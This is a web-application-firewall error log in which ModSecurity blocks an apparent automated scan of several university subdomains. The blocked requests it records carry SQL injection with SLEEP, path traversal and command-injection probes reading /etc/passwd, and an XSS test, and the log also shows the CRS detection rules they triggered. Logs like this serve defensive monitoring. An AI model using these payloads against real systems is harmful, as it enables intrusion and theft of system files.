[Tue Aug 29 11:41:03.585140 2023] [:error] [pid 1838] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:firstname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:firstname: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO1238Co-f0AAAcuUmQAAAAI"]
[Tue Aug 29 11:41:03.586760 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:firstname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:firstname: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO1238Co-f0AAAcsLD4AAAAE"]
[Tue Aug 29 11:41:03.588495 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sidebar. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:sidebar: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/default/en_US/frame.A100.html"] [unique_id "ZO1238Co-f0AAAYMWUUAAAAR"]
[Tue Aug 29 11:41:03.600825 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:firstname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:firstname: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO1238Co-f0AAAcvBd8AAAAJ"]
[Tue Aug 29 11:41:03.619705 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/searchblox/servlet/FileServlet"] [unique_id "ZO1238Co-f0AAAYMWUYAAAAR"]
[Tue Aug 29 11:41:03.620774 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/searchblox/servlet/FileServlet"] [unique_id "ZO1238Co-f0AAAcvBeAAAAAJ"]
[Tue Aug 29 11:41:03.622403 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/searchblox/servlet/FileServlet"] [unique_id "ZO1238Co-f0AAAcsLD8AAAAE"]
[Tue Aug 29 11:41:03.623628 2023] [:error] [pid 1838] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:firstname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:firstname: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO1238Co-f0AAAcuUmYAAAAI"]
[Tue Aug 29 11:41:03.644557 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/searchblox/servlet/FileServlet"] [unique_id "ZO1238Co-f0AAAaZ9msAAAAo"]
[Tue Aug 29 11:41:03.646496 2023] [:error] [pid 1838] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:firstname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:firstname: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO1238Co-f0AAAcuUmcAAAAI"]
[Tue Aug 29 11:41:04.388037 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:userPage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:userPage: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/CFIDE/debug/cf_debugFr.cfm"] [unique_id "ZO124MCo-f0AAAcsLEIAAAAE"]
[Tue Aug 29 11:41:04.388814 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:userPage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:userPage: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "journal.unla.ac.id"] [uri "/CFIDE/debug/cf_debugFr.cfm"] [unique_id "ZO124MCo-f0AAAaZ9m0AAAAo"]
[Tue Aug 29 11:41:04.389131 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:userPage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:userPage: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/CFIDE/debug/cf_debugFr.cfm"] [unique_id "ZO124MCo-f0AAAYMWUkAAAAR"]
[Tue Aug 29 11:41:04.401114 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:userPage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:userPage: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/CFIDE/debug/cf_debugFr.cfm"] [unique_id "ZO124MCo-f0AAAYf-M0AAAAD"]
[Tue Aug 29 11:41:04.411050 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:userPage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:userPage: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "pusatbahasa.unla.ac.id"] [uri "/CFIDE/debug/cf_debugFr.cfm"] [unique_id "ZO124MCo-f0AAAaZ9m4AAAAo"]
[Tue Aug 29 11:41:04.425435 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cat_id: ${system(cat/etc/passwd)}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/infusions/downloads/downloads.php"] [unique_id "ZO124MCo-f0AAAYf-M4AAAAD"]
[Tue Aug 29 11:41:04.427906 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cat_id: ${system(cat/etc/passwd)}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/infusions/downloads/downloads.php"] [unique_id "ZO124MCo-f0AAAcvBeUAAAAJ"]
[Tue Aug 29 11:41:04.437212 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cat_id: ${system(cat/etc/passwd)}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/infusions/downloads/downloads.php"] [unique_id "ZO124MCo-f0AAAcsLEQAAAAE"]
[Tue Aug 29 11:41:04.475227 2023] [:error] [pid 1838] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cat_id: ${system(cat/etc/passwd)}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/infusions/downloads/downloads.php"] [unique_id "ZO124MCo-f0AAAcuUmwAAAAI"]
[Tue Aug 29 11:41:04.478727 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/searchblox/servlet/FileServlet"] [unique_id "ZO124MCo-f0AAAcsLEYAAAAE"]
[Tue Aug 29 11:41:04.499822 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:firstname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:firstname: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO124MCo-f0AAAcoNPAAAAAF"]
[Tue Aug 29 11:41:05.355706 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/catalog.php"] [unique_id "ZO124cCo-f0AAAcsLEcAAAAE"]
[Tue Aug 29 11:41:05.371359 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/catalog.php"] [unique_id "ZO124cCo-f0AAAYf-NAAAAAD"]
[Tue Aug 29 11:41:05.380729 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:s_Language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:s_Language: ../../../../../../../../../../../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/language/lang"] [unique_id "ZO124cCo-f0AAAYMWVAAAAAR"]
[Tue Aug 29 11:41:05.383753 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:s_Language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:s_Language: ../../../../../../../../../../../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/language/lang"] [unique_id "ZO124cCo-f0AAAcoNPIAAAAF"]
[Tue Aug 29 11:41:05.385254 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:s_Language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:s_Language: ../../../../../../../../../../../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/language/lang"] [unique_id "ZO124cCo-f0AAAcqJH0AAAAG"]
[Tue Aug 29 11:41:05.400480 2023] [:error] [pid 1838] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:s_Language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:s_Language: ../../../../../../../../../../../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/language/lang"] [unique_id "ZO124cCo-f0AAAcuUnAAAAAI"]
[Tue Aug 29 11:41:05.401001 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:s_Language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:s_Language: ../../../../../../../../../../../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/language/lang"] [unique_id "ZO124cCo-f0AAAYMWVEAAAAR"]
